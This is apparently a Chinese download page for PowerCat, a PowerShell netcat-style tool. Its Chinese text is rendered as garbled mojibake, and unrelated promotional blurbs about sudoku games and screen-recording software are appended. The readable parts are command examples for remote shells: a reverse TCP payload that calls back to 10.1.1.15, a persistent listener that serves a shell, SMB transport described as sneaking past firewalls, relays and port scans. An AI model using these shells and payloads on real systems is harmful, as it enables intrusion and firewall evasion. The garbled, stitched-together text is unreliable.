PowerCatÊÇPowerShellµÄTCP/ IPÈðÊ¿¾üµ¶£¬ÊÊÓÃNetcat Ncat.¡£¼ÙÈçÄãÒªÔÚpowershellÉÏÁ¬SSH»òÊǹ¹½¨ÍøÂç¿Õ¼ä£¬ÄÇüNPowerCat¿Ï¶¨²»¿É»òȱ£¡ÈÈÁÒ»¶ÓÃâ·ÑÏÂÔØ£¡
PowerCatÈçºÎʹÓÃ
powercatÊÂʵÉÏÊÇÒ»¸öpowershellµÄºÊý£¬Èç¹ûÄãµÚÒ»´ÎÓ¦ÓÃËüµÄÇé¿öÏÂÄãÐèÒªÔË×÷½Å±¾ÖÆ×÷À´ÔØÈëÕâÒ»ºÊý¡£
ÒòΪwindowsĬÈÏÉèÖò»ÔÊÐíÒ»Çнű¾ÖÆ×÷ÔË×÷£¬ÄãÐèÒª¼üÈëSet-ExecutionPolicy RemoteSignedÀ´ÈÝÐíÔË×÷µ±µØµÄ½Å±¾ÖÆ×÷¡£
PowerCat PowerShell¿ØÖÆÄ£¿é×°°ü¡£ÄãÎñ±Øµ¼½ø¿ØÖÆÄ£¿éÓ¦ÓÃÆä×÷Óá£
# Import the functions via the psd1 file:
Import-Module PowerCat.psd1
ĬÈÏÉèÖÃ×´¿öÏÂ,PowerCatÓ¦ÓÃTCPºÍÔØÈë/ÔØÈë¿ØÖÆÃæ°å¡£
# Basic Listener:
Start-PowerCat -Port 443
# Basic Client:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443
Îļþ´«ËÍ
Ó¦ÓÃsendfile PowerCatÄܹ»ÓÃÓÚ´«ÊäÎļþºÍ-ReceiveFileÖ÷Òª²ÎÊý¡£
# Send File:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile
# Receive File:
Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile
UDPºÍSMB
PowerCatÊÊÓöà¸ù¾ÝTCP´«ËÍÊý¾Ý¡£
# Send Data Over UDP:
Start-PowerCat -Mode Udp -Port 8000
# Send Data Over SMB (easily sneak past firewalls):
Start-PowerCat -Mode Smb -PipeName PowerCat
SSL
PowerCat¶¯Ì¬ÐÔת»¯³É¸øÓèSSLÊý¾Ý¼ÓÃܵÄX509×ʸñÖ¤ÊéTCPÁª½Ó¡£
# Admin privileges are required to generate the self-signed certificate.
# Serve an SSL-Encrypted (Power)Shell:
Start-PowerCat -Mode Tcp -Port 80 -SslCn Certificate Common Name -Execute
# Connect to an SSL encrypted Ncat listener:
# Setup *nix with openssl Ncat:
# OpenSSL req -X509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem
# ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem
Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat
Æû³µ¼ÌµçÆ÷
PowerCatÀàËÆnetcatÆû³µ¼ÌµçÆ÷Æû³µ¼ÌµçÆ÷,µ«Äã²»Óý¨Á¢Ò»¸öÎĵµ»òÔËÐÐÒ»¸ö¹ý³Ì¡£Ä㻹¿ÉÒÔ´«ËͲ»Ò»ÑùºÏͬÖмäµÄÐÅÏ¢Áª½Ó¡£
# UDP Listener to TCP Client Relay:
Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443
# TCP Listener to UDP Client Relay:
Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53
# TCP Client to Client Relay
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443
# TCP Listener to SMB Listener Relay
New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat
ת»¯³ÉµÄÖØÁ¦ÌݶÈ
ºÉÔØÄܹ»Ó¦ÓÃNew-PowerCatPayloadºÊýת»¯³É¡£
# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute
# Generate a tcp payload that listens on port 8000:
New-PowerCatPayload -Listener -Port 8000 -Execute
PowerCat»¹Äܹ»ÊµÐж˿ÚɨÃèÆ÷,Öð½¥²»¶ÏµÄ¹ÛÖÚ,»ò×öΪһ¸ö¼ò½àµÄweb·þÎñÆ÷¡£
# Basic TCP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -TIMeout 1 -Verbose -Disconnect }
# Basic UDP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }
# Persistent listener:
Start-PowerCat -Port 443 -Execute -KeepAlive
# Simple Web Server:
Start-PowerCat -Port 80 -SendFile index.html
PowerCat»ù±¾ÒªËغÍÖ÷Òª²ÎÊý
Start-PowerCat # Starts a listener/server.
-Mode # Defaults to Tcp, can also specify Udp or Smb.
-Port # The port to listen on.
-PipeName # Name of pipe to listen on.
-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: Mode:Port/PipeName
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-KeepAlive # Restart after disconnecting.
-Timeout # Timeout option. Default: 60 seconds
Connect-PowerCat # Connects a client to a listener/server.
-Mode # Defaults to Tcp, can also specify Udp or Smb
-RemoteIp # IPv4 address of host to connect to.
-Port # The port to connect to.
-PipeName # Name of pipe to connect to.
-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: Mode:IP:Port/PipeName
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-Timeout # Timeout option. Default: 60 seconds
Êý¶ÀÓÎÏ·Êý×ÖÅÅÁз½Ê½Ç§±äÍò»¯£¬Êý¶ÀÒ²ÊǶÍÁ¶ÄÔ½îµÄºÃ·½·¨¡£Èç¹ûÄãÒ²ÊÇһλÊý¶ÀÓÎÏ·°®ºÃÕߵϰ£¬ÄǾͲ»ÄÜ´í¹ýÒÔÏÂÕâЩÁË£¬º¸ÇÁ˵±Ç°×îÐÂÊý¶ÀÓÎÏ·¿ÉÒÔÃâ·ÑÍæ£¬»¹ÓоµäÊý¶ÀÓÎÏ·àÞ£¡
¼ÊÓÆµ×¨ÓÃÈí¼þËüÊÇÒ»¸öÊ®·ÖʵÓÃÓÖÊ®·ÖרҵµÄµçÄÔÆÁÄ»Â¼ÖÆ¹¤¾ß£¬µçÄÔ¼ÆÁרÓÃÈí¼þÖ»ÐèÒ»¼ü¾ÍÄÜ¿ªÆôÂ¼ÖÆ¹¦ÄÜ£¬²Ù×÷Ê®·ÖµÄ¼òµ¥£¬²»Äܸܺ´ÔÓ£¬¸ü¼Ó·½±ãÁËÓû§µÄ¹¤×÷ЧÂÊ£¬Ê¹ÓÃÆÁϼÏñר¼Ò¿ÉÒԺܷ½±ãµØÂ¼ÖÆ×Ô¼ºµÄ½ÌѧÊÓÆµ¡¢²Ù×÷ÑÝʾ¡¢ÍøÂç½Ìѧ¡¢ÍøÂçµçÊÓµçÓ°µÈµÈ£¬»¹¿ÉÒÔÂ¼ÖÆ³ÉFLASH¶¯»¡¢WMV¶¯»¡¢AVI¶¯»»òÕß×Ô²¥·ÅµÄEXE¶¯»£¬¼È¼òµ¥ÓÖʵÓá£ÆÁϼÏñר¼Ò¾ßÓг¤Ê±¼ä¼Ïñ²¢È·±£ÉùÒôÍêȫͬ²½µÄÄÜÁ¦¡£
¶àÌØÈí¼þվΪÄúÌṩ×îÐÂÖ÷²¥×¨ÓÃÃÀÑÕÈí¼þרÌâ,ÔÚÕâÀﰲ׿°æÆ»¹û°æµÈÓ¦ÓÃÓ¦Óо¡ÓУ¬ÕÒ×îÐÂÖ÷²¥×¨ÓÃÃÀÑÕÈí¼þ¾ÍÀ´¶àÌØÈí¼þÕ¾¡£
¶àÌØÈí¼þרÌâΪÄúÌá¹©ÍøÂ繤¾ß,taptapÍøÂ繤¾ß,¹ÒÍøÂ繤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
Êý¶ÀÓÎÏ·£¬Êý¶ÀÊÇÒ»ÖÖÔËÓÃÖ½¡¢±Ê½øÐÐÑÝËãµÄÂß¼ÓÎÏ·¡£Íæ¼ÒÐèÒª¸ù¾Ý9¡Á9ÅÌÃæÉϵÄÒÑÖªÊý×Ö£¬ÍÆÀí³öËùÓÐÊ£Óà¿Õ¸ñµÄÊý×Ö£¬²¢Âú×ãÿһÐС¢Ã¿Ò»ÁС¢Ã¿Ò»¸ö´ÖÏß¹¬ÄÚµÄÊý×Ö¾ùº¬1-9£¬²»Öظ´¡£